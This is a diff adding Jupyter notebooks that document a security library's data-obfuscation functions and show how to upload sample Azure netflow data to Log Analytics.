+       "0  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.697   \n",
+       "1  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.681   \n",
+       "2  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.681   \n",
+       "\n",
+       "             FlowStartTime          ResourceGroup           VMName  \\\n",
+       "0  2019-02-12 13:00:07.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "1  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "2  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "\n",
+       "  VMIPAddress                       PublicIPs SrcIP DestIP L4Protocol  \\\n",
+       "0    10.0.3.5                  [65.55.44.109]   NaN    NaN          T   \n",
+       "1    10.0.3.5  [13.71.172.130, 13.71.172.128]   NaN    NaN          T   \n",
+       "2    10.0.3.5  [13.71.172.130, 13.71.172.128]   NaN    NaN          T   \n",
+       "\n",
+       "       AllExtIPs  \n",
+       "0   65.55.44.109  \n",
+       "1  13.71.172.128  \n",
+       "2  13.71.172.130  "
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "display(netflow_df.head(3))\n",
+    "netflow_df.head(3).mp_mask.mask()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Adding custom column mappings\n",
+    "\n",
+    "Note in the previous example that the VMIPAddress, PublicIPs and AllExtIPs columns were unchanged.\n",
+    "\n",
+    "We can add these columns to a custom mapping dictionary and re-run the obfuscation.\n",
+    "See the later section on [Creating Custom Mappings](#Creating-custom-mappings)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>FlowStartTime</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>VMName</th>\n",
+       "      <th>VMIPAddress</th>\n",
+       "      <th>PublicIPs</th>\n",
+       "      <th>SrcIP</th>\n",
+       "      <th>DestIP</th>\n",
+       "      <th>L4Protocol</th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.697</td>\n",
+       "      <td>2019-02-12 13:00:07.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[65.55.44.109]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[13.71.172.130, 13.71.172.128]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>13.71.172.128</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[13.71.172.130, 13.71.172.128]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>13.71.172.130</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId            TimeGenerated  \\\n",
+       "0  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.697   \n",
+       "1  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.681   \n",
+       "2  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.681   \n",
+       "\n",
+       "             FlowStartTime          ResourceGroup           VMName  \\\n",
+       "0  2019-02-12 13:00:07.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "1  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "2  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "\n",
+       "  VMIPAddress                       PublicIPs SrcIP DestIP L4Protocol  \\\n",
+       "0    10.0.3.5                  [65.55.44.109]   NaN    NaN          T   \n",
+       "1    10.0.3.5  [13.71.172.130, 13.71.172.128]   NaN    NaN          T   \n",
+       "2    10.0.3.5  [13.71.172.130, 13.71.172.128]   NaN    NaN          T   \n",
+       "\n",
+       "       AllExtIPs  \n",
+       "0   65.55.44.109  \n",
+       "1  13.71.172.128  \n",
+       "2  13.71.172.130  "
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "col_map = {\n",
+    "    \"VMName\": \".\",\n",
+    "    \"VMIPAddress\": \"ip\", \n",
+    "    \"PublicIPs\": \"ip\",\n",
+    "    \"AllExtIPs\": \"ip\"\n",
+    "}\n",
+    "\n",
+    "netflow_df.head(3).mp_mask.mask()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### ofuscate_df function\n",
+    "\n",
+    "You can also call the standard function `obfuscate_df` to perform the same operation\n",
+    "on the dataframe passed as the `data` parameter."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>FlowStartTime</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>VMName</th>\n",
+       "      <th>VMIPAddress</th>\n",
+       "      <th>PublicIPs</th>\n",
+       "      <th>SrcIP</th>\n",
+       "      <th>DestIP</th>\n",
+       "      <th>L4Protocol</th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.697</td>\n",
+       "      <td>2019-02-12 13:00:07.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.112.51.93</td>\n",
+       "      <td>[100.11.187.82]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>100.11.187.82</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.112.51.93</td>\n",
+       "      <td>[144.169.193.140, 144.169.193.144]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>144.169.193.144</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.112.51.93</td>\n",
+       "      <td>[144.169.193.140, 144.169.193.144]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>144.169.193.140</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId            TimeGenerated  \\\n",
+       "0  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.697   \n",
+       "1  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.681   \n",
+       "2  f9ef3428-3ccb-4ecd-8466-dbedc7044293  2019-02-12 14:22:40.681   \n",
+       "\n",
+       "             FlowStartTime          ResourceGroup           VMName  \\\n",
+       "0  2019-02-12 13:00:07.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "1  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "2  2019-02-12 13:00:48.000  ibmkajbmepnmiaeilfofa  fmlmbnlpdcbnbnn   \n",
+       "\n",
+       "    VMIPAddress                           PublicIPs SrcIP DestIP L4Protocol  \\\n",
+       "0  10.112.51.93                     [100.11.187.82]   NaN    NaN          T   \n",
+       "1  10.112.51.93  [144.169.193.140, 144.169.193.144]   NaN    NaN          T   \n",
+       "2  10.112.51.93  [144.169.193.140, 144.169.193.144]   NaN    NaN          T   \n",
+       "\n",
+       "         AllExtIPs  \n",
+       "0    100.11.187.82  \n",
+       "1  144.169.193.144  \n",
+       "2  144.169.193.140  "
+      ]
+     },
+     "execution_count": 15,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "data_obfus.obfuscate_df(data=netflow_df.head(3), column_map=col_map)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Creating custom mappings\n",
+    "\n",
+    "A custom mapping dictionary has entries in the following form:\n",
+    "```\n",
+    "    \"ColumnName\": \"operation\"\n",
+    "```\n",
+    "\n",
+    "The `operation` defines the type of obfuscation method used for that column. Both the column\n",
+    "and the operation code must be quoted.\n",
+    "\n",
+    "|operation code | obfuscation function |\n",
+    "|---------------|----------------------|\n",
+    "| \"uuid\"        | replace_guid         |\n",
+    "| \"ip\"          | hash_ip              |\n",
+    "| \"str\"         | hash_string          |\n",
+    "| \"dict\"        | hash_dict            |\n",
+    "| \"list\"        | hash_list            |\n",
+    "| \"sid\"         | hash_sid             |\n",
+    "| \"null\"        | \"null\"\\*             |\n",
+    "| None          | hash_str\\*           |\n",
+    "| delims_str    | hash_item\\*          |\n",
+    "\n",
+    "\\*The last three items require some explanation:\n",
+    "- null - the `null` operation code means set the value to empty - i.e. delete the value\n",
+    "  in the output frame.\n",
+    "- None (i.e. the dictionary value is `None`) default to hash_string.\n",
+    "- delims_str - any string other than those named above is assumed to be a string of delimiters.\n",
+    "  See next section for a discussion of use of delimiters.\n",
+    "\n",
+    "---\n",
+    "\n",
+    "> **NOTE** If you want to *only* use custom mappings and ignore the builtin<br>\n",
+    "> mapping table, specify `use_default=False` as a parameter to either<br>\n",
+    "> `mp_obf.obfuscate()` or `obfuscate_df`\n",
+    "---"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using `hash_item` with delimiters to preserve the structure/look of the hashed input\n",
+    "\n",
+    "Using hash_item with a delimiters string lets you create output that somewhat resembles the input\n",
+    "type. The delimiters string is specified as a simple string of delimiter characters, e.g. `\"@\\,-\"`\n",
+    "\n",
+    "The input string is broken into substrings using each of the delimiters in the delims_str. The substrings\n",
+    "are individually hashed and the resulting substrings joined together using the original delimiters.\n",
+    "The string is split in the order of the characters in the delims string.\n",
+    "\n",
+    "This allows you to create hashed values that bear some resemblance to the original structure of the string.\n",
+    "This might be useful for email address, qualified domain names and other structure text.\n",
+    "\n",
+    "For example :\n",
+    "    ian@mydomain.com\n",
+    "    \n",
+    "Using the simple `hash_string` function the output bears no resemblance to an email address"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'prqocjmdpbodrafn'"
+      ]
+     },
+     "execution_count": 16,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "hash_string(\"ian@mydomain.com\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Using `hash_item` and specifying the expected delimiters we get something like an email address in the output."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'bnm@blbbrfbk.pjb'"
+      ]
+     },
+     "execution_count": 17,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "hash_item(\"ian@mydomain.com\", \"@.\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You use `hash_item` in your Custom Mapping dictionary by specifying a delimiters string as the `operation`."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Checking Your Obfuscation\n",
+    "\n",
+    "You should check that you have correctly masked all of the columns needed. \n",
+    "There is a function `check_obfuscation` to do this.\n",
+    "\n",
+    "Use `silent=False` to print out the results.\n",
+    "If you use `silent=True` (the default it will return 2 lists of `unchanged` and\n",
+    "`obfuscated` columns)\n",
+    "\n",
+    "```\n",
+    "data_obfus.check_obfuscation(\n",
+    "    data: pandas.core.frame.DataFrame,\n",
+    "    orig_data: pandas.core.frame.DataFrame,\n",
+    "    index: int = 0,\n",
+    "    silent=True,\n",
+    ") -> Union[Tuple[List[str], List[str]], NoneType]\n",
+    "\n",
+    "Check the obfuscation results for a row.\n",
+    "Parameters\n",
+    "----------\n",
+    "data : pd.DataFrame\n",
+    "    Obfuscated DataFrame\n",
+    "orig_data : pd.DataFrame\n",
+    "    Original DataFrame\n",
+    "index : int, optional\n",
+    "    The row to check, by default 0\n",
+    "silent: bool\n",
+    "    If False the function returns no output and\n",
+    "    returns lists of changed and unchanged columns.\n",
+    "    By default, True\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "Optional[Tuple[List[str], List[str]]] :\n",
+    "    If silent is True returns a tuple of unchanged, changed\n",
+    "    items. If False, returns None.\n",
+    "```\n",
+    "\n",
+    "> **Note** by default this will check only the first row of the data.\n",
+    "> You can check other rows using the index parameter.\n",
+    "\n",
+    "> **Warning** The two DataFrames should have a matching index and ordering because\n",
+    "> the check works by comparing the values in each column, judging that\n",
+    "> column values that do not match have been obfuscated.\n",
+    "\n",
+    "**We first test the partially-obfuscated DataFrame from earlier.**"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "===== Start Check ====\n",
+      "Unchanged columns:\n",
+      "------------------\n",
+      "AllExtIPs: 65.55.44.109\n",
+      "FlowStartTime: 2019-02-12 13:00:07.000\n",
+      "L4Protocol: T\n",
+      "PublicIPs: ['65.55.44.109']\n",
+      "TimeGenerated: 2019-02-12 14:22:40.697\n",
+      "VMIPAddress: 10.0.3.5\n",
+      "\n",
+      "Obfuscated columns:\n",
+      "--------------------\n",
+      "DestIP:   nan ----> nan\n",
+      "ResourceGroup:   asihuntomsworkspacerg ----> ibmkajbmepnmiaeilfofa\n",
+      "SrcIP:   nan ----> nan\n",
+      "TenantId:   52b1ab41-869e-4138-9e40-2a4457f09bf0 ----> f9ef3428-3ccb-4ecd-8466-dbedc7044293\n",
+      "VMName:   msticalertswin1 ----> fmlmbnlpdcbnbnn\n",
+      "====== End Check =====\n"
+     ]
+    }
+   ],
+   "source": [
+    "partly_obfus_df = netflow_df.head(3).mp_mask.mask()\n",
+    "fully_obfus_df = netflow_df.head(3).mp_mask.mask(column_map=col_map)\n",
+    "\n",
+    "data_obfus.check_obfuscation(partly_obfus_df, netflow_df.head(3), silent=False)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "**Checking the fully-obfuscated data set**"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "===== Start Check ====\n",
+      "Unchanged columns:\n",
+      "------------------\n",
+      "FlowStartTime: 2019-02-12 13:00:07.000\n",
+      "L4Protocol: T\n",
+      "TimeGenerated: 2019-02-12 14:22:40.697\n",
+      "\n",
+      "Obfuscated columns:\n",
+      "--------------------\n",
+      "AllExtIPs:   65.55.44.109 ----> 100.11.187.82\n",
+      "DestIP:   nan ----> nan\n",
+      "PublicIPs:   ['65.55.44.109'] ----> ['100.11.187.82']\n",
+      "ResourceGroup:   asihuntomsworkspacerg ----> ibmkajbmepnmiaeilfofa\n",
+      "SrcIP:   nan ----> nan\n",
+      "TenantId:   52b1ab41-869e-4138-9e40-2a4457f09bf0 ----> f9ef3428-3ccb-4ecd-8466-dbedc7044293\n",
+      "VMIPAddress:   10.0.3.5 ----> 10.112.51.93\n",
+      "VMName:   msticalertswin1 ----> fmlmbnlpdcbnbnn\n",
+      "====== End Check =====\n"
+     ]
+    }
+   ],
+   "source": [
+    "data_obfus.check_obfuscation(fully_obfus_df, netflow_df.head(3), silent=False)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "---\n",
+    "## Appendix"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "import tabulate\n",
+    "print(tabulate.tabulate(netflow_df.head(3), tablefmt=\"rst\", showindex=False, headers=\"keys\"))"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/DataUploader.ipynb b/docs/notebooks/DataUploader.ipynb
new file mode 100644
index 000000000..acb41185c
--- /dev/null
+++ b/docs/notebooks/DataUploader.ipynb
@@ -0,0 +1,832 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# MSTICpy - Data Uploaders\n",
+    "\n",
+    "### Description\n",
+    "This notebook provides a guided example of using the Log Analytics and Splunk Data Uploader included with MSTICpy.<br><br>\n",
+    "Contents:\n",
+    "- How to instanciate Uploaders\n",
+    "- Uploading DataFrames\n",
+    "- Uploading Files\n",
+    "- Uploading Folders\n",
+    "\n",
+    "You must have msticpy installed with the Azure components to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[azure]\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Processing imports....\n",
+      "Checking configuration....\n",
+      "No errors found.\n",
+      "No warnings found.\n",
+      "Setting options....\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Notebook setup complete</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "#Setup\n",
+    "from msticpy.nbtools import nbinit\n",
+    "extra_imports = [\"msticpy.data.uploaders.splunk_uploader, SplunkUploader\", \n",
+    "                \"msticpy.data.uploaders.loganalytics_uploader, LAUploader\"]\n",
+    "\n",
+    "nbinit.init_notebook(\n",
+    "    namespace=globals(),\n",
+    "    extra_imports=extra_imports,\n",
+    ");\n",
+    "\n",
+    "WIDGET_DEFAULTS = {\n",
+    "    \"layout\": widgets.Layout(width=\"95%\"),\n",
+    "    \"style\": {\"description_width\": \"initial\"},\n",
+    "}"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Unnamed: 0</th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>FlowStartTime</th>\n",
+       "      <th>FlowEndTime</th>\n",
+       "      <th>FlowIntervalEndTime</th>\n",
+       "      <th>FlowType</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>VMName</th>\n",
+       "      <th>VMIPAddress</th>\n",
+       "      <th>PublicIPs</th>\n",
+       "      <th>SrcIP</th>\n",
+       "      <th>DestIP</th>\n",
+       "      <th>L4Protocol</th>\n",
+       "      <th>L7Protocol</th>\n",
+       "      <th>DestPort</th>\n",
+       "      <th>FlowDirection</th>\n",
+       "      <th>AllowedOutFlows</th>\n",
+       "      <th>AllowedInFlows</th>\n",
+       "      <th>DeniedInFlows</th>\n",
+       "      <th>DeniedOutFlows</th>\n",
+       "      <th>RemoteRegion</th>\n",
+       "      <th>VMRegion</th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "      <th>TotalAllowedFlows</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>881</td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2019-02-12 14:22:40.697</td>\n",
+       "      <td>2019-02-12 13:00:07.000</td>\n",
+       "      <td>2019-02-12 13:45:08.000</td>\n",
+       "      <td>2019-02-12 14:00:00.000</td>\n",
+       "      <td>AzurePublic</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td>msticalertswin1</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>['65.55.44.109']</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>https</td>\n",
+       "      <td>443.0</td>\n",
+       "      <td>O</td>\n",
+       "      <td>4.0</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>eastus2</td>\n",
+       "      <td>eastus</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "      <td>4.0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>877</td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>2019-02-12 13:58:33.000</td>\n",
+       "      <td>2019-02-12 14:00:00.000</td>\n",
+       "      <td>AzurePublic</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td>msticalertswin1</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>['13.71.172.130', '13.71.172.128']</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>https</td>\n",
+       "      <td>443.0</td>\n",
+       "      <td>O</td>\n",
+       "      <td>18.0</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>canadacentral</td>\n",
+       "      <td>eastus</td>\n",
+       "      <td>13.71.172.128</td>\n",
+       "      <td>18.0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   Unnamed: 0                              TenantId           TimeGenerated  \\\n",
+       "0         881  52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-12 14:22:40.697   \n",
+       "1         877  52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-12 14:22:40.681   \n",
+       "\n",
+       "             FlowStartTime              FlowEndTime      FlowIntervalEndTime  \\\n",
+       "0  2019-02-12 13:00:07.000  2019-02-12 13:45:08.000  2019-02-12 14:00:00.000   \n",
+       "1  2019-02-12 13:00:48.000  2019-02-12 13:58:33.000  2019-02-12 14:00:00.000   \n",
+       "\n",
+       "      FlowType          ResourceGroup           VMName VMIPAddress  \\\n",
+       "0  AzurePublic  asihuntomsworkspacerg  msticalertswin1    10.0.3.5   \n",
+       "1  AzurePublic  asihuntomsworkspacerg  msticalertswin1    10.0.3.5   \n",
+       "\n",
+       "                            PublicIPs SrcIP DestIP L4Protocol L7Protocol  \\\n",
+       "0                    ['65.55.44.109']   NaN    NaN          T      https   \n",
+       "1  ['13.71.172.130', '13.71.172.128']   NaN    NaN          T      https   \n",
+       "\n",
+       "   DestPort FlowDirection  AllowedOutFlows  AllowedInFlows  DeniedInFlows  \\\n",
+       "0     443.0             O              4.0             0.0            0.0   \n",
+       "1     443.0             O             18.0             0.0            0.0   \n",
+       "\n",
+       "   DeniedOutFlows   RemoteRegion VMRegion      AllExtIPs  TotalAllowedFlows  \n",
+       "0             0.0        eastus2   eastus   65.55.44.109                4.0  \n",
+       "1             0.0  canadacentral   eastus  13.71.172.128               18.0  "
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Load some sample data\n",
+    "df = pd.read_csv('https://raw.githubusercontent.com/microsoft/msticpy/master/tests/testdata/az_net_flows.csv', parse_dates=['TimeGenerated'])\n",
+    "df.head(2)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## LogAnalytics Data Uploader\n",
+    "Below we collect some details required for our uploader, instanciate our LogAnalytics data uploader and pass our DataFrame loaded above to be uploaded.\n",
+    "We are setting the debug flag on our uploader so we can get some additional details on our upload progress."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "8d7a06200a5c403db4f6b39c9666738b",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='', description='Workspace ID:')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "421afec5cfff4917b0396f935a9c8dd5",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Password(description='Workspace Key:')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "la_ws_id = widgets.Text(description='Workspace ID:')\n",
+    "la_ws_key = widgets.Password(description='Workspace Key:')\n",
+    "display(la_ws_id)\n",
+    "display(la_ws_key)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Upload response code: 200\n",
+      "Upload to upload_demo complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Instanciate our Uploader\n",
+    "la_up = LAUploader(workspace=la_ws_id.value, workspace_secret=la_ws_key.value, debug=True)\n",
+    "# Upload our DataFrame\n",
+    "la_up.upload_df(data=df, table_name='upload_demo')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Upload a file\n",
